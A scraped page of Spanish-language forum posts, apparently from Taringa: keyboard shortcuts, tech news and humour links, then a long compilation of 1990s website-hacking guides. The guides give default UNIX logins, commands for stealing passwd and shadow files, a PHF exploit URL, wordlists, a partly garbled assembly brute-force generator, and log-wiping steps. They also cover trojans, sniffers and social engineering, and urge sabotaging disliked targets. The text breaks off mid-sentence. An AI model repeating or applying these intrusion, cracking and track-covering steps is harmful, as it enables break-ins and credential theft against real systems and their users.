apagado) * ALT + SHIFT + BLOQ NUM (Switch MouseKeys el encendido o apagado) * MAYÚS cinco veces (Switch StickyKeys el encendido o apagado) * BLOQ NUM cinco segundos (Switch ToggleKeys el encendido o apagado) * Logotipo de Windows + U (Abre el Administrador de utilidades) Atajos de teclado para el Explorador de Windows * FIN (Mostrar la parte inferior de la ventana activa) * INICIO (Mostrar la parte superior de la ventana activa) * BLOQ NUM + signo asterisco (*) (Mostrar todas las subcarpetas que están en la carpeta seleccionada) * BLOQ NUM + Signo más (+) (Mostrar el contenido de la carpeta seleccionada) * BLOQ NUM + signo menos (-) (Contraer la carpeta seleccionada) * FLECHA IZQUIERDA (Contraer la selección actual si es ampliado, o seleccionar la carpeta principal) * FLECHA DERECHA (Mostrar la selección actual si está colapsado, o seleccionar la primera subcarpeta) Teclas de acceso directo para Mapa de caracteres * Después de hacer doble clic en un personaje de la parrilla de salida de caracteres, puede mover a través de la red mediante el uso de los métodos abreviados de teclado: * FLECHA DERECHA (Mover a la derecha o hacia el comienzo de la siguiente línea) * FLECHA IZQUIERDA (Mover a la izquierda o hacia el final de la línea anterior) * FLECHA ARRIBA (Subir una fila) * FLECHA ABAJO (Mover hacia abajo una fila) * PÁGINA ARRIBA (Mover hacia arriba una pantalla a la vez) * PÁGINA ABAJO (Mover hacia abajo una pantalla a la vez) * INICIO (Mover al principio de la línea) * FIN (Mover al final de la línea) * CTRL + INICIO (Ir al primer carácter) * CTRL + FIN (Ir al último carácter) * BARRA ESPACIADORA (Cambiar entre ampliada y tampoco mal modo cuando un personaje se ha seleccionado) Atajos de teclado sobre la ventana principal (Microsoft Management Console (MMC)) * CTRL + O (Abre una consola guardada) * CTRL + N (Abre una nueva consola) * CTRL + S (Guardar la consola abierta) * CTRL + M (Agregar o quitar un tema de consola) * CTRL + W (Abre una nueva ventana) * Tecla F5 (Actualizar el contenido de todas las ventanas de consola) * ALT + BARRA ESPACIADORA (Mostrar el menú de la ventana MMC) * ALT + F4 (Cerrar la consola) * ALT + A (Mostrar el menú Acción) * ALT + V (Mostrar el menú Ver) * ALT + F (Mostrar el menú Archivo) * ALT + O (Mostrar el menú Favoritos) Atajos de teclado para la ventana de la consola * CTRL + P (Imprimir la página actual o el panel activo) * ALT + signo menos (-) (Mostrar el menú de la ventana de la ventana de la consola activa) * MAYÚS + F10 (Mostrar el menú Acción para el elemento seleccionado) * Tecla F1 (Abra el tema de Ayuda, en su caso, para el elemento seleccionado) * Tecla F5 (Actualizar el contenido de todas las ventanas de consola) * CTRL + F10 (Maximizar la ventana de la consola activa) * CTRL + F5 (Restaurar la ventana de la consola activa) * ALT + ENTER (Muestra el cuadro de diálogo Propiedades, en su caso, para el elemento seleccionado) * Tecla F2 (Cambie el nombre del elemento seleccionado) * CTRL + F4 (Cerrar la ventana de la consola activa. Cuando una consola sólo tiene una ventana de consola, este acceso directo se cierra la consola) Navegación para Conexión a Escritorio remoto * CTRL + ALT + FIN (Abrir el cuadro de diálogo de seguridad de microsoft Windows NT) * ALT + AV PÁG (Cambiar entre programas de izquierda a derecha) * ALT + PAGINA ABAJO (Switch entre programas de derecha a izquierda) * ALT + INSERT (ciclo a través de los programas utilizados más recientemente, en fin) * ALT + INICIO (Mostrar el menú Inicio) * CTRL + ALT + INTER (Cambiar el equipo cliente entre una ventana y una pantalla completa) * ALT + SUPR (Mostrar el menú de Windows) * CTRL + ALT + signo menos (-) (Colocar una instantánea de la ventana activa en el cliente de Terminal Server en el portapapeles y proporcionar la misma funcionalidad que presionar IMPR PANT en un equipo local.) * CTRL + ALT + Signo más (+) (Colocar una instantánea de toda la zona de la ventana del cliente de Terminal Server en el portapapeles y proporcionar la misma funcionalidad que pulsando ALT + IMPR PANT en un equipo local.) Navegación de Internet * CTRL + B (Abra el cuadro de diálogo Organizar Favoritos) * CTRL + E (Abrir la barra de búsqueda) * CTRL + F (Iniciar la utilidad Buscar) * CTRL + H (Abrir la barra Historial) * CTRL + I (Abrir la barra Favoritos), * CTRL + L (Abrir el cuadro de diálogo Abrir) * CTRL + N (otro ejemplo de inicio del navegador con la misma dirección Web) * CTRL + O (Abrir el cuadro de diálogo Abrir, al igual que CTRL + L) * CTRL + P (Abre el cuadro de diálogo Imprimir) * CTRL + R (Actualizar la página Web actual) * CTRL + W (Cerrar la ventana actual) Fuente: http://www.lorenzoservidor.com.ar/ Saludos Gente, Comenten

19
0
F
Facebook Supero A Google En E.E.U.U.
InfoporAnónimo7/12/2010

Esto de Facebook está llegando a niveles insospechados: según la empresa de análisis HitWise, la red social de Mark Zuckerberg superó por primera vez en su historia a Google en Estados Unidos. En esta lucha entre dos “Gran Hermano”, Facebook, el menor, le pegó por primera vez un buen puñetazo a su hermano mayor. Entre el 6 y el 13 de marzo de 2010, Facebook representó el 7,07% del tráfico de internet en el país de McDonalds y Bill Gates. Google copó el 7,03%, apenas 0,04% menos. Según los gráficos del último año, la red social subió un 185% en ese período, frente al 9% del buscador. Aunque no es la primera vez que Facebook supera a Google en EE.UU., lo notable de este hecho es que por primera lo consigue a lo largo de una semana, sin feriados ni días excepcionales. Más atrás, aparecen Yahoo Mail con un 3,8% y Yahoo.com con un 3,67%. Además, el gráfico refleja cómo Zuckerberg y sus empleados fueron ganando terreno a lo largo del fructífero 2009, dejando atrás a su gran rival en ese país: MySpace. ]

0
8
E
El mejor disfraz para un criminal.
HumorporAnónimo7/12/2010

Un hombre muy nervioso entra rapidamente a un restaurante en donde se esconde detras de un disfraz muy ridiculo de bailarina, al poco rato un policia entra y buscando a esa persona el policia se va dejando a las personas muy admiradas. link: http://www.youtube.com/watch?v=7MvniG7NdvA

0
0
¿Con ganas de reir? Este es el post indicado ^^
¿Con ganas de reir? Este es el post indicado ^^
HumorporAnónimo7/12/2010

Un hombre sale muy asustado despues de buscar algun animal que se perdio en ese parque, las personas pasan por ese lugar sin saber que se llevarian un pequeño susto al ver a un leon de peluche que espanto a aquel hombre. link: http://www.youtube.com/watch?v=KZvA1Yhr4h8 Si te quedaste con ganas de ver mas visita mis siguientes post! http://www.taringa.net/posts/videos/6121263/Un-Insecto-Espantoso!-:O.html http://www.taringa.net/posts/humor/6121054/Cuidado-con-la-ara%C3%B1a-O_O!!!.html http://www.taringa.net/posts/humor/6120953/El-mejor-disfraz-para-un-criminal_.html http://www.taringa.net/posts/videos/6119555/Le-robaron-el-auto-por-hacerse-el-k-po-xD.html http://www.taringa.net/posts/humor/6119720/La-Rutina-De-Un-Geek-%5E%5E.html http://www.taringa.net/posts/humor/6119797/Steve-Jobs-y-Bill-Gates-hablando-de-la-pobreza!.html

0
0
T
Tecnologia para el Dia del Juicio Final (Documental Español
Ciencia EducacionporAnónimo8/20/2010

La amenaza del "Día del Juicio Final" va desde la muy real (los arsenales nucleares), hasta controvertida (el calentamiento global) o futurista (nanotecnología, ciborgs y robots). A pesar del final de la Guerra Fría, seguimos viviendo bajo la sombra de las armas nucleares y la carrera armamentística. También está presente un tema aún más candente: la conexión entre el calentamiento global y los combustibles fósiles. Examinaremos si pueden estar originando una repentina y nueva Edad de Hielo. También estudiaremos las tecnologías del siglo XXI que tipifican la espada de doble filo que supone esta nueva tecnología, con su enorme potencial tanto para la creación como para la destrucción: la nanotecnología (ingeniería a escala diminuta), la robótica y la cibernética. Seremos testigos de asombrosas aplicaciones en el trabajo, nos maravillaremos ante las posibilidades infinitas y oiremos las advertencias sobre un posible "Día del Juicio Final", con máquinas diminutas y fuera de control, que devoran todo a su paso. Saludos Gente De T!

0
0
¿Queres saber como hackear una web? No Te Lo Pierdas!
¿Queres saber como hackear una web? No Te Lo Pierdas!
Ciencia EducacionporAnónimo7/12/2010

1. Introduccion Si alguna vez has hechado a volar tu imaginacion se te habra ocurrido que seria comico remover algunas graficas de algun website, o mejor aun borrar toda la pagina de algun enemigo para deleitarte con tu venganza. Pues bien, este es el manual que te ayudara a lograrlo. Primero deberas entender que andar por ahi borrando paginas es *TONTO* e inmaduro. Lo que trato de hacer es que sientas la adrenalina de entrar a un sistema al que no estes autorizado y echar una ojeada alrededor. Si te dedicas a invadir sistemas y borrar archivos le quitaras el privilegio a otra persona de entrar a ese sistema ya que el operador se dara cuenta de la intrusion y aumentaran la seguridad negando asi la entrada a mas 'intrusos'. Si el sistema al que entraste pertenece a unos hijos de la chingada (Plantas Nucleares, Creadores de abrigos de piel, Agencias de Gobierno,etc) olvida lo antes dicho y haz que se arrepientan de haberse conectado a la red causando kaos o mejor aun, infectandolos con algun buen virus (por que no reemplazar un ejecutable por un caballo de troya?). En fin, usa tu cabeza y cuida de no ser sorprendido en tus viajes de kAoS. 2. Websites Un website es solamente una computadora llamada servidor por su capacidad de de realizar diferentes tareas al mismo tiempo, ejecutando un sistema operativo que generalmente sera UNIX o algunas de sus variaciones y con toda la informacion guardada en algun medio. 2.1 Ganando acceso a un servidor WWW Aqui reside la magia del Hacker, la proteccion comun son dos preguntas Login y Password. El usuario que tenga una cuenta en ese servidor tiene un nombre de usuario (Login) y contrase¤a (Password) por lo que la entrada a ese servidor no tiene problemas; pero para una persona ajena a ese servidor la entrada es un poco mas complicada. Para poder penetrar el sistema necesitamos saber su URL y una vez conectados con el explorador prestar atencion al mensaje waiting reply from 103.38.28 o algo parecido que haga aparecer una direccion IP en lugar de el nombre de dominio. Si lograste conseguir la direccion IP usa telnet para conectarte a esa direccion. Si cuando tratas de conectarte aparece el mensaje 'connection refused' probablemente este protegida esa direccion con una FIREWALL. Si este es el caso trata de hacer telnet a el nombre de dominio con la finalidad de llegar a el frustrante LOGIN/PASSWORD. Para entrar necesitas conseguir alguna cuenta haciendo algo de ingenieria social o intenta con los defaults. * CUENTAS DEFAULTS DE UNIX * Login: Password: root root root system sys sys sys system daemon daemon uucp uucp tty tty test test unix unix unix test bin bin adm adm adm admin admin adm admin admin sysman sysman sysman sys sysman system sysadmin sysadmin sysadmin sys sysadmin system sysadmin admin sysadmin adm who who learn learn uuhost uuhost guest guest host host nuucp nuucp rje rje games games games player sysop sysop root sysop demo demo Si fracasas al intentar el acceso usando cada uno de los anteriores logins, probablemente tengas que conseguir el password de otra manera como relaciones humanas; esto significa que vas a tener que conseguir la clave valiendote de trucos como hablar por telefono a una persona que sepas que esta registrada en ese servidor y pedirle su Login y Password diciendo que necesitas validar su cuenta o algo parecido. Otra manera de conseguir un Password es crear un programa que robe las claves de acceso del disco duro de una persona. 3. Cuando se esta adentro Una vez que hayas logrado entrar a un sistema necesitaras localizar y obtener el archivo passwd disponible en el directorio /etc Para obtener el archivo PASSWD usa el siguiente ejemplo: ($ simboliza el prompt UNIX) $ ftp FTP> get /etc/passwd FTP> quit Para ver el contenido de el archivo usa el siguiente comando: $ cat /etc/passwd Una vez que tengas en tu posesion el archivo PASSWD editalo y fijate en su contenido, debera tener la siguiente informacion: usuario:contrase¤a:ID:Grupo:descripcion/nombre:directorio:shell usuario - Este es el login de algun usuario. contrase¤a - Es el password de el usuario (encriptada con DES) ID - Es la identificacion de ese usuario. grupo - El grupo al que pertenece esta cuenta. descripcion- El nombre del usuario. directorio - El directorio de acceso de el usuario. shell - El shell que procesa los comandos de ese usuario. Un ejemplo podria ser: john:234abc56:9999:13:John Johnson:/home/dir/john:/bin/john Nombre de usuario: john Password encriptado: 234abc56 Usuario numero: 9999 Numero de grupo: 13 Descripcion: John Johnson Directorio de acceso: /home/dir/john Shell: /bin/john Si el archivo que conseguiste contiene la misma informacion pero en el campo del password tiene un asterisco (*) o cualquier otro caracter, significa que las contrase¤as se encuentran 'sombreadas'. Si las contraseñas se encuentra sombreada,las podras encontrar en el archivo shadow aunque generalmente no se puede tener acceso a ese archivo a menos de tener root. Una forma de conseguir SHADOW es usando el comando cp para copiarlo a otro archivo y despues tratar de obtener el archivo al que se copio, ejemplo: $cp /etc/shadow /usuarios/carlos/hack.txt $ftp FTP> get /usuarios/carlos/hack.txt FTP> quit $rd /usuarios/carlos/hack.txt Algunas otras maneras de obtener el archivo SHADOW seran explicadas en otros numeros de RareGaZz. Ya tengo los passwords encriptados, ahora que? Los passwords estan encriptados usando one-way encription, significa que no se pueden des-encriptar. Lo que Unix hace es obtener la contraseña del usuario,la encripta y la compara con la que ya esta encriptada, si coinciden entonces se le permite el acceso. Para poder obtener las contraseñas es necesario tener un archivo con palabras y usar un programa para que encripte las palabras del archivo y las compare con las contrase¤as encriptadas,si coinciden te avisa que palabra fue la que coincidio con la contrase¤a encriptada. Algunos programas de este tipo son: Nombre Palabras por Segundo Computadora John the Ripper 5077 586 Starcracker 1300 586 Cracker Jack 1008 586 KillerCracker 350 586 Estos programas se encuentran disponibles en cualquier pagina de Hackers, si quieres la ultima version de StarCracker visita la siguiente URL: http://www.geocities.com/SiliconValley/park/8403/index.html Para conseguir listas de palabras haz FTP a el siguiente servidor: warwick.ac.uk directorio: /pub/cud Algunas de las palabras mas usadas en contraseñas son: aaa academia ada adrian aerobics airplane albany albatros albert alex alexander algebra alias alisa alpha alphabet ama amy analog anchor andy andrea animal answer anything arrow arthur ass asshole athena atmosphere bacchus badass bailey banana bandit banks bass batman beautiful beauty beaver daniel danny dave deb debbie deborah december desire desperate develop diet digital discovery disney dog drought duncan easy eatme edges edwin egghead eileen einstein elephant elizabeth ellen emerald engine engineer enterprise enzyme euclid evelyn extension fairway felicia fender finite format god hello idiot jester john johnny joseph joshua judith juggle julia kathleen kermit kernel knight lambda larry lazarus lee leroy lewis light lisa louis love lynne mac macintosh mack maggot martin marty marvin matt master maurice maximum merlin mets michael michelle mike minimum nicki nicole rascal really rebecca remote rick reagan robot robotics rolex ronald rose rosebud rosemary roses ruben rules ruth sal saxon scheme scott secret sensor serenity sex shark sharon shit shiva shuttle simon simple singer single singing smile smooch smother snatch snoopy soap socrates spit spring subway success summer super support surfer suzanne tangerine tape target taylor telephone temptation tiger tigger toggle tomato toyota trivial unhappy unicorn unknown urchin utility vicki virginia warren water weenie whatnot whitney will virgin william winston willie wizard wonbat yosemite zap whatnow Obtuve algunas cuentas, ahora? Para poder hacer y deshacer en el servidor necesitas el password de la cuenta root. Si despues de intentar con algunas listas de palabras no puedes necesitaras hacer un ataque en bruto, es decir empezar desde la letra A hasta la palabra zzzzzzzz El siguiente programa necesita ser compilado usando TASM y es una lista de palabras TSR que no ocupa espacio en disco y puede ser modificada, es ideal para ataques brutos a la cuenta r00t (Programa Copiado de Phrack 47) P A S S W O R D E N G I N E (for IBM PC's) by Uncle Armpit +++++++++++++++++++++++++++++++++++++++++++++ Que tan practico es? Este programa no necesita mucho espacio en disco y puede crear listas de palabras de gran tama¤o. Con el ejemplo proporcionado, passwords empezando en 'aaaaaaa' y terminando en 'zzzzzzz' seran generados. Como empiezo a usar esta lista de palabras? Compila el codigo y nombralo "hackdrv.sys", despues necesitas configurarlo añadiendo la siguiente linea en CONFIG.SYS device=c:hackdrv.sys Una vez en memoria el programa creara la lista de variables en memoria llamada HACKPWD. Cualquier programa que uses (excepto StarCracker) debera reconocer hackpwd como una lista de palabras y empezar a crackear. Si deseas reiniciar una sesion desde una combinacion especifica solo modifica el archivo HACKDRV.SYS con un editor HEXADECIMAL y modifica la cadena de caracteres con los que empieza ;-0 ;-----------------------cut here-------------------------------- ;Program HACKDRV.SYS ; org 0h next_dev dd -1 attribute dw 0c000h ;character device w/ ioctl calls strategy dw dev_strategy interrupt dw dev_int dev_name db 'HACKPWD ' countr dw offset number number db 'aaaaaa',0ah ;<---- 6 caracteres en minusculas (empiezo) numsize equ $-number - 2 afternum: ;working space for device driver rh_ofs dw ? rh_seg dw ? dev_strategy: ;strategy routine mov cs:rh_seg,es mov cs:rh_ofs,bx retf dev_int: ;interrupt routine pushf push ds push es push ax push bx push cx push dx push di push si cld push cs pop ds mov bx,cs:rh_seg mov es,bx mov bx,cs:rh_ofs mov al,es:+2 rol al,1 mov di,offset cmdtab xor ah,ah add di,ax jmp word ptr cmdtab: ;command table dw init ;0 dw exit3 ;1 dw exit3 ;2 dw ioctl_read ;3 dw do_read ;4 dw exit3 ;5 dw exit3 ;6 dw exit3 ;7 dw exit3 ;8 dw exit3 ;9 dw exit3 ;10 dw exit3 ;11 dw ioctl_write ;12 dw exit3 ;13 dw 5 dup (offset exit3) ioctl_read: push es push bx mov si,es:[bx+10h] mov di,es:[bx+0eh] mov es,si push cs pop ds mov si,offset number xor cx,cx get_char: lodsb stosb inc cl cmp al,0ah jz ioctl_rend jmp get_char ioctl_rend: pop bx pop es mov es:[bx+012h],cx mov cs:countr,offset number jmp exit2 ioctl_write: push es push bx mov si,es:[bx+010h] mov ds,si mov si,es:[bx+0eh] mov cx,numsize+1 ;es:[bx+012h] push cs pop es mov di,offset number repe movsb pop es pop bx mov cs:countr,offset number jmp exit2 do_read: push es push bx push cs pop ds mov si, inc si ;word ptr cmp si,offset afternum jnz is_okay mov si,offset number call inc_num is_okay: mov ,si mov di,es:+0eh mov ax,es:+010h mov cx, es:+012h jcxz clean_up mov es,ax repe movsb clean_up: pop bx pop es jmp exit2 exit3: mov es:word ptr 3,08103h jmp exit1 exit2: mov es:word ptr 3,0100h exit1: pop si pop di pop dx pop cx pop bx pop ax pop es pop ds popf retf exit: inc_num proc near push si mov si,numsize reiterate: inc byte ptr [number+si] cmp byte ptr [number+si],'z'+1 ;+1 past ending char. in range jnz _exit mov byte ptr [number+si],'a' ;starting char. in range dec si cmp si,-1 jnz reiterate mov byte ptr ,01ah ;send EOF _exit: pop si ret inc_num endp at_eof: ; the non-resident code starts here initial proc near push es push cs pop ds push cs pop es mov si,offset number mov di,offset tmpnum cld _again: lodsb cmp al,0ah jz _nomorechars stosb jmp _again _nomorechars: mov si,offset msgend mov cx,4 repe movsb mov ah,09 ;print welcome message mov dx,offset msg1 int 21h pop es ret initial endp init: call initial mov ax,offset at_eof mov es:+0eh,ax push cs pop ax mov es:+010h,ax mov cs:word ptr cmdtab,offset exit3 jmp exit2 msg1 db "Incremental Password Generator (c)1995",0ah,0dh db "Written by Uncle Armpit",0ah,0dh,0ah,0dh db "Starting at word [" tmpnum db 10 dup (?) msgend db "]",0a,0d,'$' ;END hackdrv.sys ----------------------------------cut here---------------------------------- Como limpiar tus huellas Si deseas que tu ingreso con la cuenta r00t no quede registrado en los LOGS de el servidor revisa los directorios buscando archivos como logs, syslog, log, o cualquiera que parezca que guarda un reporte de los accesos y borralos o mejor aun editalos usando el editor de archivos de UNIX. Para ejecutar el editor usa el comando vi Edita o borra los siguientes archivos: /etc/syslog /etc/log /etc/logs Existen algunos scripts para borrar las huellas como ZAP! disponibles en la red y en los proximos numeros de esta revista. Le PompaItor Hackear Paginas WEB: * Introducción * Diferencias en los tipos de WEB * Obteniendo Passwords en el tipo A. * Obteniendo Passwords en el tipo B. * Precauciones. * Sobre el autor 1º INTRODUCIÓN El objetivo de este documento es el dar a conocer posibles formas de alteración del contenido de una página WEB por personal no autorizado a ello ( llamémoslo hacking ). No me hago responsable del uso que se pueda hacer de este documento, pues su única finalidad es la de informar, y el que lo use para otra cosa... lo hace bajo SU entera responsabilidad... ¿ Queda claro ?, si no te parece bien deja de leer y borra el fichero de tu HD ( disco duro para los muy novatos...). Las cosas que se describen en este fichero no te aseguran éxito seguro, probablemente en la mayoría de los casos solo te sirvan para empezar, teniendo que improvisar tu, pero prometo que este doc. será mejor que los que he visto sobre el tema en Internet. El nivel de este documento es básico, pues no intenta enseñar todo en un dia, mas que nada saber como empezar a hacer algo digamos "util". Nota: A pesar de que podras hacer todo lo que aquí pone desde Windows 95 o 98, te recomiendo que pruebes algun Linux (aunque sea el Trinux, que cabe en 3 disketes x´PPP (www.trinux.org)). Este documento esta escrito en WORD pk lo tiene todo cristo ( jeje casi todos ilegal para que se joda Microsoft (con perdon)). 2º DIFERENCIAS ENTRE TIPOS DE WEBs Creo que para que nos entendamos mejor, es importante distinguir entre dos clases de WEBs, las webs personales, que pueden ser modificadas por el usuario propietario mediante su clave (tipo Geocities, Xoom y los proveedores de acceso a Inet que ofrecen espacio WEB). El segundo tipo, serian aquellas WEBs, llamemoslas "principales" de un servidor, que solo pueden ser modificadas por usuarios con muy altos privilegios (llamemosles "root" o "administrador". Pues que bien ¿no?, y esta diferenciación tan chorra... ¿para que vale?... pues la utilizaremos para diferenciar las formas de hacernos con los passwords que nos dejan modificarlas... evidentemente no es igual de facil conseguir ser root en un server que tener una cuenta de usuario... asi que para esto es la diferenciación. 3º OBTENIENDO PASSWORDS DE TIPO A (USUARIO): Estos passwords de usuarios, generalmente no muy cualificados, se caracterizan por ser muy chorras, osea faciles de recordar, repetidos con los passwords de otras cosas... asi que si la persona propietaria de las WEB es alguien cercano a ti, puedes empezar provando algunas palabras que te puedan parecer "interesantes" ( nombre del perro, mujer, hijos, fecha de nacimiento, lugar de residencia...), pero tampoco te mates mucho provando pues esto es perder el tiempo muchas veces, asi que si a los 10 o 11 intentos ( según tu paciencia ) no sale nada, mejor dejes esta forma Pero también seria una buena idea intentar sacar el password a la "victima" a traves de engaños y demas ( lo llaman ingenieria social...), por ejemplo puedes ligarte al tio/a y conseguir que te diga su pass... o tambien puedes intentar meterle un troyano tipo BO o NETBUS, que te permitiran sacarle las pass, evidentemente no voy a contar aquí lo que le tienes que decir a la victima para que te crea... eso tendras que currelarlo tu un pokito Ademas, si conseguimos el fichero de passwords del servidor... ¡¡Estamos de suerte!! Pues generalmente los passwords de usuario son bastante fáciles de crackear... solo elige el usuario y pon el john the ripper a trabajar ( el john es uno de los programas de cracking de ficheros PASSWD de UNIX mas conocidos, puedes conseguirlo en www.geocities.com/SiliconValley/Peaks/7837 , si no sabes usarlo... DON´T WORRY, trae ayuda...). Pero probablemente el problema no sea el uso del John, sino el conseguir el fichero PASSWD, asi que para eso vamos al siguiente apartado de este cursillo. 3º OBTENIENDO PASSWORDS DE TIPO B (root): Normalmente los administradores de los servidores no se chupan el dedo, asi que conseguir el fichero o el root directamente a traves de un exploit ( programa que se aprovecha de un BUG o agujero en el sistema operativo) no sea una tarea facil. Lo primero que puedes intentar es pillar el passwd por el FTP... y cuando eso no te haya funcionado probar el PHF ( escribir la siguiente linea en tu navegador: http://www.host.com/cgi-bin/phf?Qalias=%0a/bin/cat%20/etc/passwd , donde host.com es el nombre del servidor...), si el phf funcionase ( en estos tiempos ya suele estar parcheado en casi todos los servidores, asi que si no te sirve no te deprimas), tendrias en tu pantalla el fichero passwd, pero antes de alegrarte fijate en algo, si aparece: root:*:0:0:Charlie &:/root:/bin/csh ( un asterisco (*) detrás del nombre "root" y los dos puntos, también puede aparecer una equis (x)...), querra decir que el fichero esta shadow osea que aparte del PASSWD necesitas otro archivo... el SHADOW, puedes intentar sacarlo con PHF cambiando la palabra passwd del final de la linea del PHF por la palabra shadow ( para ser un poco mas explicito puedes jugar con el phf, cambiando de directorio... supongo que te estaras dando cuenta de cómo y si no, hay va una pista... "etc" es el nombre de un directorio ). Buiino, si lo anterior no ha funcionado, no te preocupes, aún tenemos mas bazas que jugar. Si por cualquier casualidad de la vida posees una cuenta de usuario en el servidor, puedes intentar hacerte con el passwd ( y con el shadow si hace falta) a traves de telnet ( prueba con cat o more , para ver si Dios es tu amigo y puedes editar los archivos...) o, puedes enterarte del Sistema operativo que usa el server, version ... (enterate también de la version del STMP, FTP ...) y vete a buscar exploits ( ya explique antes lo que son exploits...). Una vez que lo/s tengas pues... los pruebas!!! ¿Sino para que coño los has cojido?... para provarlos, primero tendras que compilarlos ( ojo, hay sploits que no hay que compilar, pues simplemente consisten en teclear unos comandos o algo asi... jeje si tienes algo de esperiencia seguro que recuerdas algunos viejos compañeros ). Un buen sitio para pillar exploits es: http://www.rootshell.com/ ¿ Y donde los compilo ?, pues o el propio server ( con gcc ) o en otro con el mismo SO, ojo no puedes compilar exploits para un SUN en un linux Red Hat ... una vez que lo tengas compilado lo ejecutas... y a ¡jugar! Despues de todo esto, y otro poco por tu parte seguramente ya tengas root en algun pequeño server para provar... (recuerda si no tienes mucha soltura... empieza por china o por alli lejotes... que si te pillan no se meteran mucho contigo ¿verdad?). 4º PRECAUCIONES Pues eso... procura no usar cuentas verdaderas para conectar ( aunque piensa que si dejas huellas... los marrones seran pal dueño de la cuenta, y eso no esta bien..., asi que cuidado con las cuentas de internet robadas, solo usar las que sepais que el dueño es un verdadero hijoputa o algo asi... o mejor si usas servidores "intermedios" o borras las huellas con algun zapper ( si lo usas sastamente como un exploit)... ahh, si te kurrelas un root y tal, pues deja algun sniffer y eso para recoger la cosecha... ( mas ke na no desperdiciar kurro ya hecho). 5º SOBRE EL AUTOR Pues el capullo que escribe todo esto es CHEvARA, individuo que podreis encontrar en el IRC hispano por #scripting, #hack o #comunistas, cuya WEB por si quieres verla es: www.geocities.com/SiliconValley/Peaks/7837 y e-mail por si tenes algo que comentar: chevara@hotmail.com . Me he decidido a escribir esto simplemente porque ley un doc sobre el tema tan malo que me dije... por muy mal que lo haga yo seguro que queda algo mas "util", y aquí esta, espero que a alguien le sirva de algo... CopyRight by CHEvARA ´98 Saludos para todos mis colegas del IRC y para los demas miembros de GHT. Si quieres poner este doc. en una web o FTP, por favor avisame ( no pedir permiso, sino avisar para que me haga ilu y me emociones y todo eso ... x´P ) COMO HACKEAR PÁGINAS WEB (BlackJack Ago-97) blackbot@hotmail.com http://www.redestb.es/personal/lcd Bien.. seguro que este es uno de los puntos que más interesa a los hackers novatillos... Ante la falta de documentos de este tipo en castellano, he decidido crear este yo mismo. No voy a explicar todas las técnicas que se pueden usar para conseguirlo, (ya no las se). Las técnicas son infinitas. Por cada agujero posible en un sistema, hay una técnica. Solo es necesario encontrar la adecuada. Antes que nada debemos inspeccionar el lugar que vamos a "visitar". Debemos buscar todos los posibles accesos al sistema... (telnet, ftp, etc...) COGIENDO EL FICHERO DEL PASSWORD A TRAVES DE FTP Ok, bien... Una de las formas más facil de conseguir ser "superusuario" en el sistema es accediendo a traves de ftp anónimoal fichero "passwd". Primero necesitas conocer algo sobre los ficheros password: root:User:g36Dfr:1j2YF6:1256:20:Superuser Camilo:p5P:h0iuE:2552:20:Camilo,:/usr/personal/camilo:/bin/csh BlackJack:EUhg3zACG2ab:1128:20:BlacJack LCD:/usr/personal/lcd:/bin/csh Este es el ejemplo de un fichero encriptado normal. El superusuario es la parte que te da el root. Es la parte que nos interesa. root:*:0:1:Misericordios:/:/bin/sh ftp:*:202:102:Anonymous FTP:/U1/ftp ftpadmin:*:203:102:ftp Administrator:/u1/ftp Este es otro ejemplo de un fichero password, solo que este tiene una pequeña diferencia este está controlado. Los password controlados no te dejan ver o copiar el actual password encriptado . Esto causa problemas para el Cracker y el diccionario que uses (después se explica). Losiguiente es otro ejemplo de otro password controlado: root:*:0:1:0000-Admin(0000):7:/usr/bin/csh daemon:*:1:1:0000-Admin(0000):/: bin:*:2:2:0000-Admin(0000):/usr/bin: etc... los password controlados tienen un "*" o "x" en el lugar donde va el password. Ahora que tu conoces un poco más acerca de como identificar un password encriptado de un password controlado, podemos hablar de como crackearlo. Cracker un password no es tan complicado como parece. Los archivos varían de sistema a sistema. Debemos antes que nada, de hacernos con el fichero passwd. Bajatelo a tu disco duro. Una vez lo tengas en tu disco duro necesitas un cracker y un diccionario. Puedes usar el Cracker Jack, John the ripper (aconsejado), jack the ripper, brute force cracker.... Los puedes encontrar en cualquier página de hacking, incluido la mía. http://www.redestb.es/personal/lcd Cuando ejecutes el cracker, deberas indicar cual es el fichero passwd. Hay muchos sistemas para buscar el passwd. Aqui es donde actua el diccionario. Un diccionario encuentra todas las posibles combinaciones posibles con el alfabeto que uses, incluyendo toda clase de caracteres "raros". Lo normal es que tenga predefinido miles de palabras posibles. Si este método no funciona se hace un rastreo completo, probando todas las combinaciones posibles desde 1 caracter hasta el total permitido. Asi SIEMPRE lo encuentra, aunque el problema está en que tarda mucho. Una vez tengas el password, YA ESTA!!! tendrás acceso a todo el sistema. TECNICA PHF la tecnica del phf es una de la más vieja (y que menos suele funcionar,tambien hay que decirlo) de conseguir un password. Es Imprescindible probarla siempre. (por probar que no quede...) ya que no cuesta nada y aveces se encuentra a alguna víctima que cae. Todo lo que debes hacer es abrir tu "notescapes navegando" y escribir lo siguiente: http://www.web_a_hackear.es/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd reemplaza www.web_a_hackear.es por el dominio. y ya está!. acontinuación se empezará a transmitir una linda copia del fichero con los password (si funciona, claro está). REDES LOCALES Otro sistema es buscar la direccion IP del dominio a hackear. Todas las máquinas conectadas a la red tienen una dirección IP. por ejemplo: www.probando.com debemos averiguar el IP de este servidor. (no me jodas con que no sabes como). hay miles, no, millones de programitas que te lo dicen. (hasta con el 7thsphere port fuck que viene con el sript de irc de mismo nombre, te lo dice) suponiendo que fuese: 194.179.23.100 esto es la dirección IP de la máquina central. Tal vez inaccesible, pero si tiene una red local conectada a esta.. (ordenador del diseñador, del director... que se yo!) las máquinas de la red tendrán un IP muy parecido. Sabes lo que puede pasar si en tu navegador escribes lo siguiente?: 194.179.23.101 o 194.179.23.102 ... etc... que accederás a los ordenadores que estén en esa red local (siempre y cuando sean tan capullos de no protegerlos porque no están cara al público!) curioso ¿no? DIRECTORIOS OCULTOS Este método aunque parezca una chorrada... te juro que no lo es. Te voy a narrar algo que paso por diciembre del 96 a un amigo hacker.... ...a ver... voy a hackear un servidor de Internet... este esta bien. Son novatos. Mucho mejor, seguro que tendrán un huevo de fallos. ¿Tendrán ftp anonimo? Login: anonymous passworD: anonymous yeah! hay ftp anónimo con programitas shareware jeje.... mmmm... no está el directorio etc/ .... vamos a ver si deja cambiar de directorio. igual está oculto. -chg directory cambiar a /etc no existe. igual lo tienen protegido. cambiar a /administrador no existe. cambiar a /administrator SI EXISTE... hehehe que hay en este directorio... etc/ bin/ mail/ (joder!) etc..... joder! si están las páginas web aqui! y el correo electrónico y todo! ah!. Soy un hacker no un criminal. A 